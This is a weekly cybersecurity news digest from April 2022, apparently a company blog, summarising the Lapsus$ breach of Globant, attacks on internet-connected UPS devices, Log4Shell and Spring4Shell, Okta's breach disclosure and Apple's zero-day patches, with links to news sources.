Lapsus$ is back, Apple's urgent security patch and more. What you need to know from last week.

We're all busy. We know we should be keeping a better eye on the latest developments in cybersecurity, but life and work can seem to get in the way.


Here's a look at what you need to know from last week heading into your Monday, April 4, 2022.


Topic of the week:


Globant – Lapsus$ Breach

Lapsus$ is back from their “vacation,” announcing their return with a blow to the software consultancy giant Globant. The breach targeted the Globant DevOps team, releasing their admin credentials (username and password) and roughly 70GB of leaked customer data.

At 9:50 pm CST on the 29th, Lapsus$ posted to their telegram channel a screenshot of the customer data they obtained, presumably using the compromised Globant DevOps credentials. Minutes later, they posted the credentials themselves and at least some of the data they acquired with access to Globant’s servers.


Globant works with some of the largest companies in the world, and this breach appears to disclose data for Arcserve, Facebook, the Apple Health app, DHL, Citibank, BNP Paribas Cardiff, and Citibanamex, among others.


Researchers were quick to point out that the company wasn’t using MFA on the compromised tools and the passwords are short and easily guessable. Some of them even appear on the “Common Passwords List”, which itself is indicative of serious shortcomings in the security practices at play here. After the release of the data, Lapsus$ stated they were releasing the passwords, “for anyone who is interested about the poor security practices in use at Globant.com.”


To read more, check out this article from Threatpost:

https://threatpost.com/lapsus-back-from-vacation/179156/


Cyber attacks:


UPS Attacks

Not UPS as in the shipping company, but UPS as in Uninterruptible Power Supply. UPSs are the backbone of any data center and many other critical resources worldwide, allowing them to stay active through power outages and unstable power. The Cybersecurity and Infrastructure Security Agency (CISA) released an alert this week warning companies that they have seen an increase of attacks directed at the UPS hardware on which our critical infrastructure relies. Way back when, UPSs were never connected to the internet – they functioned to keep the power on, that was it. But in recent years, the internet of things has reached even UPS manufacturers and newer models have included an IoT capability for various ease-of-use reasons. After all, especially as workforces continue to decentralize, it has become necessary to have the ability to manage the UPSs in your data center remotely. The danger of this attack is that access to the UPSs can allow lateral jumps across your network, leading to a whole host of malicious activity; from targeting other internal systems or cutting power to mission critical systems.


https://www.cisa.gov/uscert/ncas/current-activity/2022/03/29/mitigating-attacks- against-uninterruptable-power-supply-devices


https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/


Cyber news:


VMware Log4Shell

The notorious Log4j vulnerability is still being spotted out “in the wild”, although it appears to have even larger goals than we saw in the hours and days immediately following its discovery. VMware Horizon servers, which are a common Virtual Desktop Infrastructure (VDI) software across corporate verticals, was affected by the Log4j vulnerability. While the exploit has been patched, Horizon is an indispensable requirement for day-to-day business operations. Taking it down means massive downtime for employees, making many companies slow to update the software. Although it may be hard to stomach the downtime, the potential impact of the delay is substantial. As systems remain exposed, attackers have more time to deepen their infiltration and inevitably extend the duration of their access, profoundly multiplying the financial risk.


https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/


Spring4Shell

Similar to the Log4Shell vulnerability, Spring Framework this week has announced that they have discovered a vulnerability that has been used for multiple Remote Code Execution (RCE) attacks to date. The vulnerability allows an attacker to directly send a GET request with code to the server for the server to run, allowing an attacker total control over the server. The vulnerability has been patched in the lasted release of the affected package, although the developers warn that if their framework is used improperly, the exploit is potentially still valid. It is up to developers everywhere to patch the vulnerability if it still exists in their software.


Some of you might know that we use the Spring Framework at SOFTwarfare for our solutions. Rest assured, the team and I have thoroughly vetted our codebase on both products. We are not affected by the Spring4Shell vulnerability.


https://threatpost.com/critical-rce-bug-spring-log4shell/179173/


Okta Breach

Okta has now released a statement to the public on the breach they were victim to in early January. Okta admitted it “made a mistake” when handling the Lapsus$ breach. Okta initially reported that the attempted breach by Lapsus$ had been unsuccessful but is now backpedalling, saying that they should have handled the investigation themselves instead of relying on reports from the impacted service provider. In fact, it appears that Lapsus$ was able to use that to gain access to “superuser/admin” credentials to Okta’s internal systems. Okta admitted that the attack had affected 366 clients, or 2.5%, of its customer base. Okta continues to face questions about the lack of customer notification of the breach in January when the company first became aware. Industry experts predict Okta clients will have hard decisions ahead as they decide whether they can continue to trust their key IAM provider.


https://threatpost.com/okta-goofed-lapsus-attack/179129/

Apple Patches

Apple has released iOS and MacOS updates patching two zero-day exploits. Both of which are likely being actively exploited, based on Apple’s quick and unscheduled updates. Apple typically does not disclose much if any detail to the public on the vulnerabilities they discover as a security measure. And that this much information that was disclosed indicates that these are serious vulnerabilities so make sure to update your systems as soon as possible!

https://threatpost.com/apple-rushes-out-patches-0-days-macos-ios/179222/


In general, I would like to wrap up with this: stay alert for phishing and email scams this week especially. CISA has issued A LOT warnings about phishing campaigns and various other scams that are targeted, which may be harder to detect than your run-of-the-mill mass phishing attempts. Stay alert - sometimes paranoia is your friend.


https://www.cisa.gov/uscert/ncas/current-activity/2022/03/30/fbi-releases-pin-phishing-campaign-against-us-election-officials


https://isc.sans.edu/diary/rss/28492


https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/


https://threatpost.com/belarusian-ghostwriter-actor-picks-up-bitb-for-ukraine-related-attacks/179210/